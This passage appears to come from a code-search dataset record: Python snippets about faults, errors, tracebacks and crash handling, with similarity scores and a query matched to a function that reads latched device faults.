"def freak():\n with settings(hide('everything'), warn_only=True):\n result = []\n try:\n check = sudo('lsof | grep DEL | grep -e crypto -e libssl')\n if check.return_code == 1:\n result = 'OK'\n logging.warning(\"%s: %s\" % (env.host, result))\n else:\n services = check.split('\\r')\n for service in services:\n service_name = service.split()[0]\n result.append(service_name)\n result = list(set(result))\n print(\"%s: VULNERABLE: %s\" % (env.host, ' '.join(result)))\n logging.warning(\"%s: VULNERABLE: %s\" % (env.host,\n ' '.join(result)))\n except Exception as e:\n logging.warning('%s: Error: %s' % (env.host, e.message))",
"def errorbars (self):\n return self._errorbars",
"def get_fault_type_label(self, cavity_number):\n # Make sure we received a valid cavity number\n self.assert_valid_cavity_number(cavity_number)\n\n # Load fault type model and make a prediction on the current example's features\n fault_idx, fault_confidence = self.make_prediction(self.fault_onnx_session)\n\n # Get the fault name and probability associated with that index\n fault_names = [\"Quench_100ms\", \"Quench_3ms\", \"E_Quench\", \"Heat Riser Choke\", \"Microphonics\", \"Controls Fault\",\n \"Single Cav Turn off\"]\n fault_name = fault_names[fault_idx]\n\n return {'fault-label': fault_name, 'fault-confidence': fault_confidence}",
"def getFailedJobs(self):\n return self.__failedJobs",
"def getErrorsList(self):\n return self.__errors",
"def get_sysfds(self):\n return [self._ptr.contents.sysfds[i] for i in range(RUSS_CONN_NSYSFDS)]",
"def get_aborted_actions(self):\n return self.failed",
"def get_traceback(self, i):\n (_, (_, _, tb)) = self.get_exception()\n\n while i and tb.tb_next:\n tb = tb.tb_next\n i -= 1\n\n return tb",
"def get_spitfp_error_count(self):\n return GetSPITFPErrorCount(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_SPITFP_ERROR_COUNT, (), '', 'I I I I'))",
"def dependency_rolls(self):\n return self._dependency_analyzer.GetDependencyRolls(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def all_errata(self):\n return self._all_errata",
"def getSyscallHooks(self):\n return None",
"def getErrorTableIndex(self, *args):\n return _libsbml.FbcExtension_getErrorTableIndex(self, *args)",
"def traceback(self):",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal"
] | [
"0.7297142",
"0.6973599",
"0.62839913",
"0.6233432",
"0.6117404",
"0.5914989",
"0.585911",
"0.5828832",
"0.56888837",
"0.5640751",
"0.5596669",
"0.55570495",
"0.5398989",
"0.5372518",
"0.5344608",
"0.5326614",
"0.52823734",
"0.525599",
"0.5215235",
"0.5206905",
"0.51792276",
"0.51715744",
"0.51645386",
"0.5153811",
"0.51442236",
"0.5125883",
"0.5123245",
"0.5093789",
"0.50876576",
"0.50817794",
"0.5032068",
"0.5025616",
"0.4981695",
"0.4981695",
"0.4980397",
"0.49771124",
"0.49738127",
"0.49723223",
"0.4921869",
"0.4915626",
"0.4901078",
"0.48889944",
"0.48836654",
"0.48517585",
"0.4849374",
"0.48324996",
"0.48176455",
"0.4802844",
"0.47814584",
"0.4777862",
"0.47610652",
"0.47609344",
"0.47511852",
"0.4740264",
"0.4733746",
"0.47331813",
"0.47296825",
"0.47276458",
"0.47261629",
"0.4720682",
"0.47180402",
"0.4714924",
"0.47041366",
"0.47032252",
"0.46961823",
"0.4691959",
"0.46909627",
"0.46824005",
"0.4668972",
"0.46686617",
"0.46554092",
"0.46504578",
"0.46438566",
"0.4634459",
"0.46245202",
"0.46169472",
"0.46156654",
"0.46156654",
"0.46139967",
"0.46054542",
"0.46039313",
"0.46025866",
"0.45971525",
"0.4595424",
"0.4589683",
"0.45861518",
"0.4584958",
"0.4583668",
"0.45823526",
"0.4578836",
"0.4576294",
"0.45666933",
"0.45558944",
"0.45450717",
"0.45297772",
"0.4518949",
"0.45095977",
"0.4505974",
"0.45040157",
"0.44922727"
] | 0.82058364 | 0 |
This will get the latched faults on the system. | def get_faults_latched(self):
request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)
return self.__get_faults_list(self.config_16.faults_latched) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_faults_current(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_current)",
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def __get_faults_list(self, faults):\n r_faults = []\n for x in faults:\n if faults[x]['value']:\n r_faults.append(faults[x]['name'])\n return r_faults",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def errors_fatal(self) -> List[Error]:",
"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def GetLongLineExceptions(self):\n return []",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def page_fault(self):\n self._page_fault += 1",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def test_crash_process(self):\n def_bucket = self.cluster.buckets[0]\n target_node = self.getTargetNode()\n remote = RemoteMachineShellConnection(target_node)\n target_vbuckets = range(0, self.cluster.vbuckets)\n retry_exceptions = list()\n self.transaction_load_task = None\n self.doc_loading_task = None\n self.N1ql_load_task = None\n\n # If Memcached is killed, we should not perform KV ops on\n # particular node. If not we can target all nodes for KV operation.\n if self.process_name == \"memcached\":\n target_vbuckets = Cbstats(target_node).vbucket_list(\n def_bucket.name, self.target_node)\n if self.target_node == \"active\":\n retry_exceptions = [SDKException.TimeoutException]\n if len(target_vbuckets) == 0:\n self.log.error(\"No target vbucket list generated to load data\")\n remote.disconnect()\n return\n\n bucket_dict = BucketUtils.get_random_collections(\n self.cluster.buckets,\n req_num=1,\n consider_scopes=\"all\",\n consider_buckets=\"all\")\n\n bucket = BucketUtils.get_bucket_obj(self.cluster.buckets,\n bucket_dict.keys()[0])\n scope_name = bucket_dict[bucket.name][\"scopes\"].keys()[0]\n collection_name = bucket_dict[bucket.name][\n \"scopes\"][scope_name][\"collections\"].keys()[0]\n scope = BucketUtils.get_scope_obj(\n bucket, scope_name)\n collection = BucketUtils.get_collection_obj(\n scope, collection_name)\n\n self.start_doc_loading_tasks(target_vbuckets, scope_name, collection)\n\n task_info = dict()\n task_info[self.doc_loading_task] = \\\n self.bucket_util.get_doc_op_info_dict(\n def_bucket, DocLoading.Bucket.DocOps.CREATE, 0,\n replicate_to=self.replicate_to, persist_to=self.persist_to,\n durability=self.durability_level,\n timeout=self.sdk_timeout, time_unit=\"seconds\",\n retry_exceptions=retry_exceptions)\n\n self.sleep(10, \"Wait for doc_ops to start\")\n self.log.info(\"Killing {0}:{1} on node {2}\"\n .format(self.process_name, self.service_name,\n target_node.ip))\n remote.kill_process(self.process_name, self.service_name,\n signum=signum[self.sig_type])\n remote.disconnect()\n # Wait for tasks completion and validate failures\n if self.transaction_load_task:\n self.task.jython_task_manager.get_task_result(\n self.transaction_load_task)\n if self.N1qltxn:\n self.task.jython_task_manager.get_task_result(\n self.N1ql_load_task)\n self.task_manager.get_task_result(self.doc_loading_task)\n self.bucket_util.verify_doc_op_task_exceptions(task_info,\n self.cluster)\n self.bucket_util.log_doc_ops_task_failures(task_info)\n\n # Verification stats\n verification_dict = dict()\n verification_dict[\"ops_create\"] = 2*self.num_items\n verification_dict[\"sync_write_aborted_count\"] = 0\n verification_dict[\"rollback_item_count\"] = 0\n verification_dict[\"pending_writes\"] = 0\n if self.__is_sync_write_enabled:\n verification_dict[\"sync_write_committed_count\"] = 2*self.num_items\n\n if self.bucket_type == Bucket.Type.EPHEMERAL \\\n and self.process_name == \"memcached\":\n result = self.task.rebalance(self.cluster, [], [])\n self.assertTrue(result, \"Rebalance failed\")\n\n # Validate doc count\n if self.process_name != \"memcached\":\n stats_failed = \\\n self.durability_helper.verify_vbucket_details_stats(\n def_bucket, self.cluster_util.get_kv_nodes(self.cluster),\n vbuckets=self.cluster.vbuckets,\n expected_val=verification_dict)\n if stats_failed:\n self.fail(\"Cbstats verification failed\")\n\n # Doc count validation per collection\n if not self.N1qltxn and self.atomicity is False:\n self.bucket_util.validate_docs_per_collections_all_buckets(\n self.cluster)",
"def pin_errors(self):\n for m in range(self.stage_width_list[-1]):\n error, _ = rqrmilib.calculate_submodel_error(self._get_native_object(), self.probe, len(self)-1, m)\n if error < 0: error = 0\n self.error_list[m] = int(error)\n self.rqrmi_state_changed = True\n return self.error_list",
"def check_for_initial_crash(test_runner, crash_retries, testcase):\n crash_times = []\n flaky_stack = False\n saved_crash_state = None\n saved_security_flag = None\n saved_unsymbolized_crash_state = None\n\n results = test_runner.execute_parallel_runs(crash_retries)\n\n for result in results:\n if not result.is_crash():\n continue\n\n if result.should_ignore():\n continue\n\n crash_state = result.get_state(symbolized=True)\n security_flag = result.is_security_issue()\n unsymbolized_crash_state = result.get_state(symbolized=False)\n\n if not unsymbolized_crash_state:\n continue\n\n if security_flag != testcase.security_flag:\n continue\n\n crash_times.append(result.crash_time)\n\n if not saved_crash_state:\n saved_crash_state = crash_state\n saved_security_flag = security_flag\n saved_unsymbolized_crash_state = unsymbolized_crash_state\n continue\n\n crash_comparer = CrashComparer(crash_state, saved_crash_state)\n if not crash_comparer.is_similar():\n flaky_stack = True\n\n logs.log('Total crash count: %d/%d. Flaky: %s. Security: %s. State:\\n%s' %\n (len(crash_times), crash_retries, flaky_stack, saved_security_flag,\n saved_crash_state))\n\n return saved_unsymbolized_crash_state, flaky_stack, crash_times",
"def _add_faults(self, feature_builder, features=None):\n if features is None:\n features = self.features\n for f in reversed(features):\n if f.type == 'fault':\n feature_builder.add_fault(f)\n # if f.type == 'unconformity':\n # break",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def find_traceback_start(self):\n ### FILL IN ###",
"def _handle_resource_exhausted_error():\n _debug_print(\n \"Traceback that led to resource exhaustion handling: \" + traceback.format_exc()\n )\n time.sleep(3)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def test_crash_races(self, exit_on_deadlock, n_proc):\n # Test for external crash signal comming from neighbor\n # with various race setup\n util.debug(\"Test race - # Processes = {}\".format(n_proc))\n executor = get_reusable_executor(max_workers=n_proc)\n pids = list(executor._processes.keys())\n assert len(pids) == n_proc\n assert None not in pids\n res = executor.map(work_sleep, [(.0001 * (j//2), pids)\n for j in range(2 * n_proc)])\n assert all(list(res))\n with pytest.raises(BrokenExecutor):\n res = executor.map(kill_friend, pids[::-1])\n list(res)",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
"def _process_failures(self, target):\n crash_synopses = self._fuzz_data_logger.failed_test_cases.get(self._fuzz_data_logger.all_test_cases[-1], [])\n if len(crash_synopses) > 0:\n self._fuzz_data_logger.open_test_step(\"Failure summary\")\n\n # retrieve the primitive that caused the crash and increment it's individual crash count.\n self.crashing_primitives[self.fuzz_node.mutant] = self.crashing_primitives.get(self.fuzz_node.mutant, 0) + 1\n self.crashing_primitives[self.fuzz_node] = self.crashing_primitives.get(self.fuzz_node, 0) + 1\n\n # print crash synopsis\n if len(crash_synopses) > 1:\n # Prepend a header if > 1 failure report, so that they are visible from the main web page\n synopsis = \"({0} reports) {1}\".format(len(crash_synopses), \"\\n\".join(crash_synopses))\n else:\n synopsis = \"\\n\".join(crash_synopses)\n self.procmon_results[self.total_mutant_index] = crash_synopses\n self._fuzz_data_logger.log_info(synopsis)\n\n if self.fuzz_node.mutant is not None and \\\n self.crashing_primitives[self.fuzz_node] >= self._crash_threshold_node:\n skipped = self.fuzz_node.num_mutations() - self.fuzz_node.mutant_index\n self._skip_current_node_after_current_test_case = True\n self._fuzz_data_logger.open_test_step(\n \"Crash threshold reached for this request, exhausting {0} mutants.\".format(skipped))\n self.total_mutant_index += skipped\n self.fuzz_node.mutant_index += skipped\n elif self.fuzz_node.mutant is not None and \\\n self.crashing_primitives[self.fuzz_node.mutant] >= self._crash_threshold_element:\n if not isinstance(self.fuzz_node.mutant, primitives.Group)\\\n and not isinstance(self.fuzz_node.mutant, blocks.Repeat):\n skipped = self.fuzz_node.mutant.num_mutations() - self.fuzz_node.mutant.mutant_index\n self._skip_current_element_after_current_test_case = True\n self._fuzz_data_logger.open_test_step(\n \"Crash threshold reached for this element, exhausting {0} mutants.\".format(skipped))\n self.total_mutant_index += skipped\n self.fuzz_node.mutant_index += skipped\n\n self.restart_target(target)\n return True\n else:\n return False",
"def tasks_with_errors(self):\n errs = []\n while True:\n try:\n errs.append(self._errq.get_nowait())\n except Queue.Empty:\n break\n return errs",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def retry_failed(self):\n \n if self.failed:\n n_rounds = len(self.failed)\n retrieved = []\n \n for _ in range(n_rounds):\n r_failed = self.failed.popleft()\n \n # List[<Result>]\n results_new = self.search(\n r_failed.query,\n **r_failed.params\n )\n \n if results_new:\n retrieved.append(results_new[0])\n \n return retrieved",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def checkReissues(self):\n return None",
"def errors(self) -> List[Error]:",
"def get_stalled_issues(self):\n \n print \"Getting stalled issues\"\n \n # Mark issues stalled if over limit \n for v in self.issue_objs.values():\n if (v.issue_type == \"New Feature\") and (v.status not in [\"Open\", \"In Progress\", \"Reopened\", \"Resolved\", \"Closed\"]):\n if int(v.time_in_status) > int(self.config.get(v.issue_type, v.status)):\n v.stalled = True\n for st in v.subtasks.values():\n if (st.status == \"In Progress\") and (st.time_in_status > int(self.config.get(v.issue_type, v.status))):\n st.stalled = True\n elif (st.status == \"In Progress\") and (st.time_in_status < int(self.config.get(v.issue_type, v.status))):\n v.stalled = False\n st.stalled = False\n \n # Put stalled issues in list\n self.stalled_nf_issues = sorted([obj for obj in self.issue_objs.values() if ((obj.issue_type == \"New Feature\") and obj.stalled)], key=operator.attrgetter('status')) # Stalled New Features\n self.stalled_st_issues = sorted([st for obj in self.stalled_nf_issues if len(obj.subtasks) for st in obj.subtasks.values() if st.stalled], key=operator.attrgetter('status')) # Stalled subtasks",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def get_fatal_alerts(self, path):",
"def _grab_sanitizer_trace(self):\n inside_sanitizer_trace = False\n self.crash_trace = []\n while True:\n captured_line = self.terminal_queue.get()\n if self.print_subprocess_output:\n print(captured_line.strip(\"\\n\"))\n if self.monitor_console:\n self.console_log.append(captured_line)\n if not inside_sanitizer_trace:\n if captured_line.find(\"ERROR: AddressSanitizer\") != -1 and captured_line.find(\"AddressSanitizer failed to allocate\") == -1:\n inside_sanitizer_trace = True\n if inside_sanitizer_trace and \\\n (captured_line.find(\"Stats: \") != -1 or\n captured_line.find(\"ABORTING\") != -1 or\n captured_line.find(\"ERROR: Failed\") != -1):\n inside_sanitizer_trace = False\n self.failure = True\n break\n if inside_sanitizer_trace:\n self.crash_trace.append(captured_line)\n if self.failure and self._IsRunning():\n self.process.terminate()\n self.process.kill()\n self.process = None",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def evaluate_fault_displacements(self,points,scale=True):\n if scale:\n points = self.scale(points,inplace=False)\n vals = np.zeros(points.shape[0])\n for f in self.features:\n if f.type == 'fault':\n disp = f.displacementfeature.evaluate_value(points)\n vals[~np.isnan(disp)] += disp[~np.isnan(disp)]\n return vals*-self.scale_factor # convert from restoration magnutude to displacement",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def getFailedJobs(self):\n return self.__failedJobs",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal",
"def test_sync_call_not_ignore_error(self):\n actors = [Actor.remote(i) for i in range(4)]\n manager = FaultTolerantActorManager(actors=actors)\n\n results = []\n for _ in range(10):\n manager.probe_unhealthy_actors(mark_healthy=True)\n results.extend(manager.foreach_actor(lambda w: w.call()))\n # Wait for actors to recover.\n wait_for_restore()\n\n # Some calls did error out.\n self.assertTrue(any([not r.ok for r in results]))\n\n manager.clear()",
"def get_backend_resistance(dirs, outDir):\n return get_response_stats(dirs, outDir, \"segfault\")",
"def getErrors(self) -> java.util.Collection:\n ...",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def flushErrors(exc_type: type) -> list[Exception]:\n # There is no public API for flushing logged errors if you're not\n # using one of trial's TestCase classes...\n from twisted.trial.runner import _logObserver # type: ignore[attr-defined]\n\n result = _logObserver.flushErrors(exc_type)\n assert isinstance(result, list)\n return result",
"def _log_crash_report():\n # For each crash report we find, dump its contents.\n # In theory we clean up after a crash so there should be only one.\n cwd = os.getcwd()\n for entry in os.listdir('.git'):\n if entry.startswith('fast_import_crash_'):\n with open(os.path.join(cwd, '.git', entry)) as f:\n report = f.read()\n # Keep the message free of repetition.\n LOG.error(\"git {}:\\n{}\".format(entry, report))",
"def handle_fault(self, event):\n msg = \"Faulty event '{}' with payload '{}' was received by state '{}'\".format(event.name, event.payload, self.name)\n raise RuntimeError(msg)",
"def _get_problem_list(self):\r\n self._success_response({'problem_list': self.server.problem_list})",
"def _find_tainted_callers(self, key_addr, f_addr):\n\n p = self._current_p\n\n self.callsites = []\n # prepare the under-contrainted-based initial state\n # we do not allow untaint as we just want to see where the key string is leading to\n self._core_taint = coretaint.CoreTaint(p, interfunction_level=0, smart_call=False,\n follow_unsat=True,\n try_thumb=True,\n exit_on_decode_error=True, force_paths=True, allow_untaint=False,\n logger_obj=log)\n\n self._current_key_addr = key_addr\n s = self._prepare_state(key_addr, f_addr)\n summarized_f = self._prepare_function_summaries()\n\n self._core_taint.set_alarm(TIMEOUT_TAINT, n_tries=TIMEOUT_TRIES)\n\n try:\n self._core_taint.run(s, (), (), summarized_f=summarized_f, force_thumb=False,\n check_func=self._find_taint_callers, init_bss=False)\n except TimeOutException:\n log.warning(\"Timeout Triggered\")\n except Exception as e:\n log.warning(\"Exception: %s\" % str(e))\n\n self._core_taint.unset_alarm()\n callsites = []\n for cs in self.callsites:\n try:\n if self._current_cfg.get_any_node(cs[0]).function_address == f_addr and cs not in callsites:\n callsites.append(cs)\n except:\n pass\n\n return callsites",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def main():\n cause_a_bunch_of_exceptions_to_happen()",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
